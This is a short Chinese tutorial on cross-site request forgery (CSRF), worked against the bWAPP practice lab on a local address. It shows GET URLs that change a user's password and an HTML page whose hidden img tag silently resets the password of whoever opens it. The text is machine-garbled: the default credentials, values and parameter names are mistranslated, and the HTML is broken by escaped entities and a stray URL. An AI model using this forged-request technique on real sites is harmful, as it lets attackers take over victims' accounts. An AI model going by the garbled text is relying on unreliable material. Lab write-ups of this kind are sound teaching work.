这篇文章给大家介绍如何解析CSRF漏洞,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。
CSRF:跨站请求伪造,伪装成用户身份来执行一些非用户自愿的恶意以及非法操作
CSRF和XSS区别:
1, CSRF需要登陆后操作,XSS不需要
2, CSRF通过伪装成受信任用户请求受信任的网站
一、环境:BWAPP
二,登陆,默认账号为:蜜蜂,密码为:错误
三,选择从在CSRF的页面,将密码修改为1111年,变化
四,分析url http://192.168.1.119/bwapp/csrf_1.php?password_new=1111&
; password_conf=1111, action=改变
五、退出账号,重新登陆一下,密码已经修改为1111
六重修修改一下url,直接访问这个这个地址,
http://192.168.1.119/bwapp/csrf_1.php?password_new=2222& password_conf=2222, action=改变
密码被重置为2222
七、隐蔽利用
1,新建一个html页面,将url地址重新修改一下,添加到img标签下的src属性,
& lt; !DOCTYPE html>& lt; html>& lt; head>& lt; title>哎呦不错哦…& lt;/title>& lt;/head>& lt; body>& lt; h3>好久不见& lt; h3>https://www.yisu.com/zixun/& lt; img src=" http://192.168.1.119/bwapp/csrf_1.php?password_new=3333 &password_conf=3333行动=改变">